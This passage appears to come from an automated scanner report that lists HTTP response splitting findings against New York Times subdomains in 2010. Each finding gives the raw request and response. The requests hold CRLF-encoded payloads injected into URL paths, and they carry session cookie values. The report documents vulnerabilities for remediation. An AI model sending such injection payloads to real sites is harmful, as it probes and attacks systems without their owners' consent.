2.27. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater2.nytimes.com
Path:	/gst/theater/tabclist.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 89d8a%0d%0af550ad8fb26 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /89d8a%0d%0af550ad8fb26/theater/tabclist.html HTTP/1.1
Host: theater2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:59 GMT
Content-length: 0
Content-type: text/html
Location: http://theater.nytimes.com/89d8a
f550ad8fb26/theater/tabclist.html

2.28. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater2.nytimes.com
Path:	/gst/theater/tabclist.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 99ac1%0d%0aaf9b8979722 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /gst/99ac1%0d%0aaf9b8979722/tabclist.html HTTP/1.1
Host: theater2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.29. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater2.nytimes.com
Path:	/gst/theater/tabclist.html

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dbbee%0d%0adec65f30f2e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /gst/theater/dbbee%0d%0adec65f30f2e HTTP/1.1
Host: theater2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.30. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/business/companies/facebook_inc/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload aa7f7%0d%0ac83acbda829 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/aa7f7%0d%0ac83acbda829/business/companies/facebook_inc/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:01 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/aa7f7
c83acbda829/business/companies/facebook_inc/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.31. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/business/companies/facebook_inc/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2bbb8%0d%0aba85651de7d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/2bbb8%0d%0aba85651de7d/companies/facebook_inc/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/2bbb8
ba85651de7d/companies/facebook_inc/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.32. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/business/companies/facebook_inc/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload b9baf%0d%0aa1360d28e2e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/news/business/b9baf%0d%0aa1360d28e2e/facebook_inc/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/business/b9baf
a1360d28e2e/facebook_inc/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.33. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/business/companies/facebook_inc/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload c984f%0d%0a8bf08eaef82 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/news/business/companies/c984f%0d%0a8bf08eaef82/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/business/companies/c984f
8bf08eaef82/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.34. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/international/countriesandterritories/afghanistan/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 452b3%0d%0a45e72dace08 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/452b3%0d%0a45e72dace08/international/countriesandterritories/afghanistan/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:01 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/452b3
45e72dace08/international/countriesandterritories/afghanistan/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.35. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/international/countriesandterritories/afghanistan/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 702ff%0d%0af1bdf025466 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/702ff%0d%0af1bdf025466/countriesandterritories/afghanistan/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/702ff
f1bdf025466/countriesandterritories/afghanistan/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.36. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/international/countriesandterritories/afghanistan/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload dd652%0d%0aabf2c5794ae was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/news/international/dd652%0d%0aabf2c5794ae/afghanistan/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/international/dd652
abf2c5794ae/afghanistan/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.37. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/international/countriesandterritories/afghanistan/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 27e5f%0d%0a005360684f4 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/news/international/countriesandterritories/27e5f%0d%0a005360684f4/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:03 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/international/countriesandterritories/27e5f
005360684f4/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.38. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/international/countriesandterritories/haiti/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ac067%0d%0a8fd1d3084c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/ac067%0d%0a8fd1d3084c5/international/countriesandterritories/haiti/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:56:27 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/ac067
8fd1d3084c5/international/countriesandterritories/haiti/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.39. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/international/countriesandterritories/haiti/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b1249%0d%0aa65178becf8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/b1249%0d%0aa65178becf8/countriesandterritories/haiti/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:56:27 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/b1249
a65178becf8/countriesandterritories/haiti/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.40. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/international/countriesandterritories/haiti/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 32910%0d%0a75a8d968bdf was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/news/international/32910%0d%0a75a8d968bdf/haiti/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:56:28 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/international/32910
75a8d968bdf/haiti/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.41. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/international/countriesandterritories/haiti/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 4754f%0d%0a05a44130f21 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/news/international/countriesandterritories/4754f%0d%0a05a44130f21/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:56:29 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/international/countriesandterritories/4754f
05a44130f21/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.42. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/science/topics/globalwarming/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b9b2a%0d%0a6be4bca8bd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/b9b2a%0d%0a6be4bca8bd/science/topics/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:52 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/b9b2a
6be4bca8bd/science/topics/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.43. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/science/topics/globalwarming/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload e5cd4%0d%0adb7fbdd22fb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/e5cd4%0d%0adb7fbdd22fb/topics/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:52 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/e5cd4
db7fbdd22fb/topics/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.44. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/top/news/science/topics/globalwarming/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 93137%0d%0a300951b64e8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/news/science/93137%0d%0a300951b64e8/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
